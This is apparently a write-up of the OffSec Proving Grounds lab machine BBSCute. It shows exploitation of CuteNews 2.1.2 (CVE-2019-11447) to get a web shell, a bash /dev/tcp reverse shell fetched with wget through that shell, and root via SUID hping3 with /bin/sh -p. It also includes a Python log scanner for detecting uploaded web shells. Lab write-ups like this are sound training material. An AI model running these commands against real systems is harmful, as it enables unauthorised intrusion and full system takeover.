This is a walkthrough of the machine BBSCute from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Intermediate
  • Flags: 2
  • OS: Linux
  • Vector: Webapp, local

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 22 - SSH
  • 80/88 - HTTP
  • 110/995 - POP3

Webapp

Enumerating the web application on port 80 using gobuster, we discover the page /index.php.

gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 64 -x php,txt

Navigating to /index.php, we discover that CuteNews 2.1.2 is running.

Initial access

CuteNews 2.1.2 is vulnerable to CVE-2019-11447. Searching for PoCs, we find this GitHub repository.

We download the Python script and take a closer look:

wget https://raw.githubusercontent.com/thewhiteh4t/cve-2019-11447/refs/heads/main/cve-2019-11447.py

The script requires a username and password, therefore we have to pivot back to the web application and register an account.

When we try to register, however, we run into a problem: a captcha is required, but it is never displayed.

Looking at the page source of /index.php?register, we find a reference to /captcha.php.

We can navigate to /captcha.php directly and use the code it shows to register an account.

/captcha.php (for demonstration purposes; the captcha value is dynamic)

With a valid account in hand, we run the exploit (the file name matches what wget saved above):

python3 cve-2019-11447.py http://<IP>/index.php <USERNAME> <PASSWORD>

Now, we have a web shell on the target, which we can use to obtain a reverse shell:

  • Create a shell.sh script
#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

  • Start a web server on our attack box
python3 -m http.server 80

  • Use the web shell to download our script
/uploads/avatar_test_4706.php?cmd=wget http://<IP>/shell.sh -O /tmp/shell.sh

  • Start a netcat listener on our attack box
nc -lvnp <PORT>

  • Use the web shell to execute the script
/uploads/avatar_test_4706.php?cmd=bash /tmp/shell.sh

We receive a shell as www-data, and can read the first local.txt flag.
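As an added detection example (not part of the original walkthrough), the following Python script scans web server access-log lines for requests to PHP files under the CuteNews /uploads/ avatar directory, which is how the web shell used above would surface to a defender. The log format, the sample lines and the command-parameter names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access-log format (regex is our own; field names are the standard ones).
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+')
UPLOAD_DIR = "/uploads/"                  # CuteNews avatar directory: static images only
SCRIPT_EXT = (".php", ".phtml", ".phar")  # extensions a PHP handler may execute
SHELL_PARAMS = {"cmd", "c", "exec"}       # assumption: typical web-shell command parameters

def classify(line):
    """Return (severity, reason) for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not (url.path.startswith(UPLOAD_DIR) and url.path.lower().endswith(SCRIPT_EXT)):
        return None                       # ordinary page, or a real avatar image
    if set(parse_qs(url.query)) & SHELL_PARAMS:
        return ("critical", f"command parameter passed to uploaded script {url.path}")
    if m.group("status") == "200":
        return ("high", f"script under {UPLOAD_DIR} executed: {url.path}")
    return ("medium", f"request for script under {UPLOAD_DIR}: {url.path}")

def scan(lines):
    """Return [(client_ip, severity, reason), ...] for every suspicious line, in log order."""
    findings = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            findings.append((line.split()[0], *verdict))
    return findings

# Constructed sample log, modelled on the request sequence in the walkthrough above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?register HTTP/1.1" 200 5120
10.0.0.5 - - [12/Mar/2024:10:01:05 +0000] "GET /captcha.php HTTP/1.1" 200 812
10.0.0.5 - - [12/Mar/2024:10:02:11 +0000] "GET /uploads/avatar_test_4706.php HTTP/1.1" 200 0
10.0.0.5 - - [12/Mar/2024:10:03:40 +0000] "GET /uploads/avatar_test_4706.php?cmd=id HTTP/1.1" 200 54
10.0.0.9 - - [12/Mar/2024:10:05:00 +0000] "GET /uploads/avatar_alice.png HTTP/1.1" 200 2210
10.0.0.7 - - [12/Mar/2024:10:06:30 +0000] "GET /uploads/avatar_bob.php HTTP/1.1" 404 196
"""

if __name__ == "__main__":
    for ip, severity, reason in scan(SAMPLE_LOG.splitlines()):
        print(f"{severity:8} {ip:9} {reason}")
```

The underlying fix is configuration: the upload directory should never be handed to the PHP handler, so any hit here indicates both an upload bypass and a missing server-side restriction.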

Privilege escalation

Before proceeding, we need to upgrade our shell to a proper TTY by running:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Without a proper TTY, the interactive hping3 prompt used below will not work correctly, so do not skip this step.

Enumerating manually for executables with the SUID bit set, we find /usr/sbin/hping3:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges: start hping3, then spawn a shell from its interactive prompt. Because the binary is SUID root, this gives us a root shell from which we can read the second flag, proof.txt:

/usr/sbin/hping3

/bin/sh -p
